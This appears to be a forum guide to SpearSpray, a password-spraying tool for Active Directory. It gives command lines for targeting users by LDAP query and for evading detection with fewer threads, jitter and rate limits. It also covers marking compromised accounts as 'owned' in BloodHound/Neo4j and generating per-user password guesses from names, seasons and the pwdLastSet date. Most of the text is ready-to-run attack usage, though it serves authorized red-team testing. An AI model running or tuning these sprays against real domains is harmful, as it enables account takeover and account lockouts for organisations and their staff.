SpearSpray Advanced & Stealth Usage Guide SpearSpray is a powerful tool for conducting password spraying attacks in Active Directory environments.
This guide covers its Advanced Usage, Stealth Techniques, Neo4j Integration, Attack Results Summary, and the Pattern System.
Advanced UsageSpearSpray supports a wide range of arguments to adapt to different scenarios:
Code:
# Domain controllers might require an encrypted connection
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local --ssl
# Password spraying on specific group of users
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local \
-q "(&(objectCategory=person)(objectClass=user)(department=IT))"
# Add symbols as separators or suffixes to patterns
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -sep '@' -suf '!'
# Integration with Neo4j/BloodHound to auto-mark compromised users
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -nu neo4j -np bloodhound
Stealth UsageSometimes you need to control SpearSpray’s speed in sensitive environments.
Here are stealth options:
Code:
# Reduce number of threads
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -t 5
# Add fixed jitter (N) or random jitter (N,M)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -j 3,5
# Limit requests per second
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local --max-rps 10These options can also be combined together for maximum stealth.
Neo4j IntegrationSpearSpray integrates with Neo4j (commonly used with BloodHound) to mark compromised accounts.
Features:
- Automatic user marking → Compromised users are flagged as "owned" in Neo4j.
- Real-time feedback → Live updates during spraying.
- Smart duplicate detection → Prevents re-marking same users.
- Comprehensive coverage → Includes both active + expired password accounts.
Attack Results SummaryAt the end of each attack, SpearSpray generates a detailed report:
- Valid Credentials → Users with working credentials
- Expired Passwords → Still compromised accounts
- Marked as Owned → Users flagged in Neo4j
- Total Attempts → Number of logins attempted
- Success Rate → Success percentage vs attempts
This helps red teamers assess impact & effectiveness quickly.
Pattern SystemUnlike static wordlists, SpearSpray uses custom patterns per user for targeted spraying.
It generates personalized passwords based on Active Directory data like `pwdLastSet`.
Available Variables:
- {name} → User’s first name (e.g., Eren)
- {samaccountname} → User login (eren.yeager)
- {year} → Year of last password set (2024)
- {short_year} → Last 2 digits of year (24)
- {month_number} → Month in number format (03)
- {month_en} → Month in English (March)
- {month_es} → Month in Spanish (Marzo)
- {season_en} → Season in English (Spring)
- {season_es} → Season in Spanish (Primavera)
- {extra} → Custom keyword (e.g., CompanyName)
- {separator} → Custom separator (e.g., @)
- {suffix} → Custom suffix (e.g., !)
Example Patterns (from patterns.txt)
Code:
# User as password
{samaccountname}
# First name + Year
{name}{separator}{year}{suffix}
# First name + Month + Year
{name}{separator}{month_number}{short_year}{suffix}
# Month name + Year
{month_en}{separator}{year}{suffix}
# Season name + Year
{season_en}{separator}{short_year}{suffix}
# Extra keyword
{extra}{separator}{year}{suffix}- {extra}{suffix} → Paradis!
- {name}{separator}{year}{suffix} → Eren@2024!
- {month_en}{separator}{short_year}{suffix} → March@24!
- {season_en}{separator}{year}{suffix} → Spring@2024!
Now if user Mikasa changed password in November 2023, her patterns differ:
- Mikasa@2023!
- November@23!
- Autumn@2023!
Conclusion